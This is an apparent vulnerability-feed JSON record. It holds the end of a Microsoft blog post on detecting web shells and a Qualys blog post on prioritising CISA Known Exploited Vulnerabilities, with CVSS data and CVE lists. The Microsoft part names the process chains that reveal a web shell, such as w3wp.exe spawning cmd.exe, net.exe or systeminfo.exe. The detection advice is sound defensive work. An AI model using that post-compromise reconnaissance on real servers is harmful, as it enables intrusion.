threats.\n\nGaining visibility into internet-facing servers is key to detecting and addressing the threat of web shells. The installation of web shells can be detected by monitoring web application directories for web script file writes. Applications such as Outlook Web Access (OWA) rarely change after they have been installed and script writes to these application directories should be treated as suspicious.\n\nAfter installation, web shell activity can be detected by analyzing processes created by the Internet Information Services (IIS) process _w3wp.exe_. Sequences of processes that are associated with reconnaissance activity such as those identified in the alert screenshot (_net.exe_, _ping.exe_, _systeminfo.exe,_ and _hostname.exe_) should be treated with suspicion. Web applications such as OWA run from well-defined Application Pools. Any _cmd.exe_ process execution by _w3wp.exe_ running from an application pool that doesn\u2019t typically execute processes such as 'MSExchangeOWAAppPool' should be treated as unusual and regarded as potentially malicious.\n\n[Microsoft Defender ATP](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-defender-advanced-threat-protection>) exposes these behaviors that indicate web shell installation and post-compromise activity by analyzing script file writes and process executions. When alerted of these activities, security operations teams can then use the rich capabilities in Microsoft Defender ATP to investigate and resolve web shell attacks.\n\n\n\n\n\n_Figure 4. Sample Microsoft Defender ATP alerts related to web shell attacks_\n\n\n\n_Figure 5. Microsoft Defender ATP alert process tree_\n\nAs in most security issues, prevention is critical. Organizations can harden systems against web shell attacks by taking these preventive steps:\n\n * Identify and remediate vulnerabilities or misconfigurations in web applications and web servers. Deploy latest security updates as soon as they become available.\n * Audit and review logs from web servers frequently. Be aware of all systems you expose directly to the internet.\n * Utilize the Windows Defender Firewall, intrusion prevention devices, and your network firewall to prevent command-and-control server communication among endpoints whenever possible. This limits lateral movement as well as other attack activities.\n * Check your perimeter firewall and proxy to restrict unnecessary access to services, including access to services through non-standard ports.\n * [Enable cloud-delivered protection](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/enable-cloud-protection-windows-defender-antivirus>) to get the latest defenses against new and emerging threats.\n * Educate end users about preventing malware infections. Encourage end users to practice good credential hygiene\u2014limit the use of accounts with local or domain admin privileges.\n\n \n\n \n\n**_Detection and Response Team (DART)_**\n\n**_Microsoft Defender ATP Research Team_**\n\n**_Microsoft Threat Intelligence Center (MSTIC)_**\n\n \n\nThe post [Ghost in the shell: Investigating web shell attacks](<https://www.microsoft.com/security/blog/2020/02/04/ghost-in-the-shell-investigating-web-shell-attacks/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-04T17:30:40", "type": "mssecure", "title": "Ghost in the shell: Investigating web shell attacks", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0604", "CVE-2019-16759"], "modified": "2020-02-04T17:30:40", "id": "MSSECURE:8D599A5B631D1251230D906E6D71C774", "href": "https://www.microsoft.com/security/blog/2020/02/04/ghost-in-the-shell-investigating-web-shell-attacks/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "qualysblog": [{"lastseen": "2022-02-25T19:27:09", "description": "_CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively._\n\n### Situation\n\nLast November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>) called \u201cReducing the Significant Risk of Known Exploited Vulnerabilities.\u201d [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of Known Exploited Vulnerabilities that carry significant risk to the federal government and sets requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires federal agencies to review and update internal vulnerability management procedures to remediate each vulnerability according to the timelines outlined in CISA\u2019s vulnerability catalog.\n\n### Directive Scope\n\nThis CISA directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency\u2019s behalf.\n\nHowever, CISA strongly recommends that public and private businesses as well as state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA\u2019s public catalog. This is truly vulnerability management guidance for all organizations to heed.\n\n### CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [379 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. CISA\u2019s most recent update was issued on February 22, 2022.\n\nThe Qualys Research team is continuously updating CVEs to available QIDs (Qualys vulnerability identifiers) in the Qualys Knowledgebase, with the RTI field \u201cCISA Exploited\u201d and this is going to be a continuous approach, as CISA frequently amends with the latest CVE as part of their regular feeds.\n\nOut of these vulnerabilities, Directive 22-01 urges all organizations to reduce their exposure to cyberattacks by effectively prioritizing the remediation of the identified Vulnerabilities.\n\nCISA has ordered U.S. federal agencies to apply patches as soon as possible. The remediation guidance is grouped into multiple categories by CISA based on attack surface severity and time-to-remediate. The timelines are available in the [Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) for each of the CVEs.\n\n### Detect CISA Vulnerabilities Using Qualys VMDR\n\nQualys helps customers to identify and assess the risk to their organizations\u2019 digital infrastructure, and then to automate remediation. Qualys\u2019 guidance for rapid response to Directive 22-01 follows.\n\nThe Qualys Research team has released multiple remote and authenticated detections (QIDs) for these vulnerabilities. Since the directive includes 379 CVEs (as of February 22, 2022) we recommend executing your search based on QQL (Qualys Query Language), as shown here for released QIDs by Qualys **_vulnerabilities.vulnerability.threatIntel.cisaKnownExploitedVulns:"true"_**\n\n\n\n### CISA Exploited RTI\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using VMDR Prioritization. Qualys has introduced an **RTI Category, CISA Exploited**.\n\nThis RTI indicates that the vulnerabilities are associated with the CISA catalog.\n\n\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n\n\nWith Qualys Unified Dashboard, you can track your exposure to CISA Known Exploited Vulnerabilities and track your status and overall management in real-time. With dashboard widgets, you can keep track of the status of vulnerabilities in your environment using the [\u201cCISA 2010-21| KNOWN EXPLOITED VULNERABILITIES\u201d](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard\n\n\n\n### Remediation\n\nTo comply with this directive, federal agencies need to remediate all vulnerabilities as per the remediation timelines suggested in [CISA Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)**.**\n\nQualys patch content covers many Microsoft, Linux, and third-party applications. However, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch all the remaining CVEs in their list.\n\nCustomers can copy the following query into the Patch Management app to help customers comply with the directive\u2019s aggressive remediation timelines set by CISA. Running this query for specific CVEs will find required patches and allow quick and efficient deployment of those missing patches to all assets directly from within Qualys Cloud Platform.\n \n \n cve:[`CVE-2010-5326`,`CVE-2012-0158`,`CVE-2012-0391`,`CVE-2012-3152`,`CVE-2013-3900`,`CVE-2013-3906`,`CVE-2014-1761`,`CVE-2014-1776`,`CVE-2014-1812`,`CVE-2015-1635`,`CVE-2015-1641`,`CVE-2015-4852`,`CVE-2016-0167`,`CVE-2016-0185`,`CVE-2016-3088`,`CVE-2016-3235`,`CVE-2016-3643`,`CVE-2016-3976`,`CVE-2016-7255`,`CVE-2016-9563`,`CVE-2017-0143`,`CVE-2017-0144`,`CVE-2017-0145`,`CVE-2017-0199`,`CVE-2017-0262`,`CVE-2017-0263`,`CVE-2017-10271`,`CVE-2017-11774`,`CVE-2017-11882`,`CVE-2017-5638`,`CVE-2017-5689`,`CVE-2017-6327`,`CVE-2017-7269`,`CVE-2017-8464`,`CVE-2017-8759`,`CVE-2017-9791`,`CVE-2017-9805`,`CVE-2017-9841`,`CVE-2018-0798`,`CVE-2018-0802`,`CVE-2018-1000861`,`CVE-2018-11776`,`CVE-2018-15961`,`CVE-2018-15982`,`CVE-2018-2380`,`CVE-2018-4878`,`CVE-2018-4939`,`CVE-2018-6789`,`CVE-2018-7600`,`CVE-2018-8174`,`CVE-2018-8453`,`CVE-2018-8653`,`CVE-2019-0193`,`CVE-2019-0211`,`CVE-2019-0541`,`CVE-2019-0604`,`CVE-2019-0708`,`CVE-2019-0752`,`CVE-2019-0797`,`CVE-2019-0803`,`CVE-2019-0808`,`CVE-2019-0859`,`CVE-2019-0863`,`CVE-2019-10149`,`CVE-2019-10758`,`CVE-2019-11510`,`CVE-2019-11539`,`CVE-2019-1214`,`CVE-2019-1215`,`CVE-2019-1367`,`CVE-2019-1429`,`CVE-2019-1458`,`CVE-2019-16759`,`CVE-2019-17026`,`CVE-2019-17558`,`CVE-2019-18187`,`CVE-2019-18988`,`CVE-2019-2725`,`CVE-2019-8394`,`CVE-2019-9978`,`CVE-2020-0601`,`CVE-2020-0646`,`CVE-2020-0674`,`CVE-2020-0683`,`CVE-2020-0688`,`CVE-2020-0787`,`CVE-2020-0796`,`CVE-2020-0878`,`CVE-2020-0938`,`CVE-2020-0968`,`CVE-2020-0986`,`CVE-2020-10148`,`CVE-2020-10189`,`CVE-2020-1020`,`CVE-2020-1040`,`CVE-2020-1054`,`CVE-2020-1147`,`CVE-2020-11738`,`CVE-2020-11978`,`CVE-2020-1350`,`CVE-2020-13671`,`CVE-2020-1380`,`CVE-2020-13927`,`CVE-2020-1464`,`CVE-2020-1472`,`CVE-2020-14750`,`CVE-2020-14871`,`CVE-2020-14882`,`CVE-2020-14883`,`CVE-2020-15505`,`CVE-2020-15999`,`CVE-2020-16009`,`CVE-2020-16010`,`CVE-2020-16013`,`CVE-2020-16017`,`CVE-2020-17087`,`CVE-2020-17144`,`CVE-2020-17496`,`CVE-2020-17530`,`CVE-2020-24557`,`CVE-2020-25213`,`CVE-2020-2555`,`CVE-2020-6207`,`CVE-2020-6287`,`CVE-2020-6418`,`CVE-2020-6572`,`CVE-2020-6819`,`CVE-2020-6820`,`CVE-2020-8243`,`CVE-2020-8260`,`CVE-2020-8467`,`CVE-2020-8468`,`CVE-2020-8599`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-22204`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33766`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-35247`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36934`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37415`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40438`,`CVE-2021-40444`,`CVE-2021-40449`,`CVE-2021-40539`,`CVE-2021-4102`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42292`,`CVE-2021-42321`,`CVE-2021-43890`,`CVE-2021-44077`,`CVE-2021-44228`,`CVE-2021-44515`,`CVE-2022-0609`,`CVE-2022-21882`,`CVE-2022-24086`,`CVE-2010-1871`,`CVE-2017-12149`,`CVE-2019-13272` ]\n\n\n\nVulnerabilities can be validated through VMDR and a Patch Job can be configured for vulnerable assets.\n\n\n\n### Federal Enterprises and Agencies Can Act Now\n\nFor federal agencies and enterprises, it\u2019s a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help your organization to achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>) to our credit.\n\nHere are a few steps Federal entities can take immediately:\n\n * Run vulnerability assessments against all of your assets by leveraging our various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Qualys Patch Management to apply patches and other configuration changes\n * Track remediation progress through our Unified Dashboards\n\n### Summary\n\nUnderstanding just which vulnerabilities exist in your environment is a critical but small part of threat mitigation. Qualys VMDR helps customers discover their exposure, assess threats, assign risk, and remediate threats \u2013 all in a single unified solution. Qualys customers rely on the accuracy of Qualys\u2019 threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any size organization efficiently respond to CISA Binding Operational Directive 22-01.\n\n#### Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-23T05:39:00", "type": "qualysblog", "title": "Managing CISA Known Exploited Vulnerabilities with Qualys VMDR", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2010-5326", "CVE-2012-0158", "CVE-2012-0391", "CVE-2012-3152", "CVE-2013-3900", "CVE-2013-3906", "CVE-2014-1761", "CVE-2014-1776", "CVE-2014-1812", "CVE-2015-1635", "CVE-2015-1641", "CVE-2015-4852", "CVE-2016-0167", "CVE-2016-0185", "CVE-2016-3088", "CVE-2016-3235", "CVE-2016-3643", "CVE-2016-3976", "CVE-2016-7255", "CVE-2016-9563", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0199", "CVE-2017-0262", "CVE-2017-0263", "CVE-2017-10271", "CVE-2017-11774", "CVE-2017-11882", "CVE-2017-12149", "CVE-2017-5638", "CVE-2017-5689", "CVE-2017-6327", "CVE-2017-7269", "CVE-2017-8464", "CVE-2017-8759", "CVE-2017-9791", "CVE-2017-9805", "CVE-2017-9841", "CVE-2018-0798", "CVE-2018-0802", "CVE-2018-1000861", "CVE-2018-11776", "CVE-2018-15961", "CVE-2018-15982", "CVE-2018-2380", "CVE-2018-4878", "CVE-2018-4939", "CVE-2018-6789", "CVE-2018-7600", "CVE-2018-8174", "CVE-2018-8453", "CVE-2018-8653", "CVE-2019-0193", "CVE-2019-0211", "CVE-2019-0541", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-0752", "CVE-2019-0797", "CVE-2019-0803", "CVE-2019-0808", "CVE-2019-0859", "CVE-2019-0863", "CVE-2019-10149", "CVE-2019-10758", "CVE-2019-11510", "CVE-2019-11539", "CVE-2019-1214", "CVE-2019-1215", "CVE-2019-13272", "CVE-2019-1367", "CVE-2019-1429", "CVE-2019-1458", "CVE-2019-16759", "CVE-2019-17026", "CVE-2019-17558", "CVE-2019-18187", "CVE-2019-18988", "CVE-2019-2725", "CVE-2019-8394", "CVE-2019-9978", "CVE-2020-0601", "CVE-2020-0646", "CVE-2020-0674", "CVE-2020-0683", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-0796", "CVE-2020-0878", "CVE-2020-0938", "CVE-2020-0968", "CVE-2020-0986", "CVE-2020-10148", "CVE-2020-10189", "CVE-2020-1020", "CVE-2020-1040", "CVE-2020-1054", "CVE-2020-1147", "CVE-2020-11738", "CVE-2020-11978", "CVE-2020-1350", "CVE-2020-13671", "CVE-2020-1380", "CVE-2020-13927", "CVE-2020-1464", "CVE-2020-1472", "CVE-2020-14750", "CVE-2020-14871", "CVE-2020-14882", "CVE-2020-14883", "CVE-2020-15505", "CVE-2020-15999", "CVE-2020-16009", "CVE-2020-16010", "CVE-2020-16013", "CVE-2020-16017", "CVE-2020-17087", "CVE-2020-17144", "CVE-2020-17496", "CVE-2020-17530", "CVE-2020-24557", "CVE-2020-25213", "CVE-2020-2555", "CVE-2020-6207", "CVE-2020-6287", "CVE-2020-6418", "CVE-2020-6572", "CVE-2020-6819", "CVE-2020-6820", "CVE-2020-8243", "CVE-2020-8260", "CVE-2020-8467", "CVE-2020-8468", "CVE-2020-8599", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-22204", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-30116", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33766", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35247", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36934", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37415", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40438", "CVE-2021-40444", "CVE-2021-40449", "CVE-2021-40539", "CVE-2021-4102", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42292", "CVE-2021-42321", "CVE-2021-43890", "CVE-2021-44077", "CVE-2021-44228", "CVE-2021-44515", "CVE-2022-0609", "CVE-2022-21882", "CVE-2022-24086"], "modified": "2022-02-23T05:39:00", "id": "QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}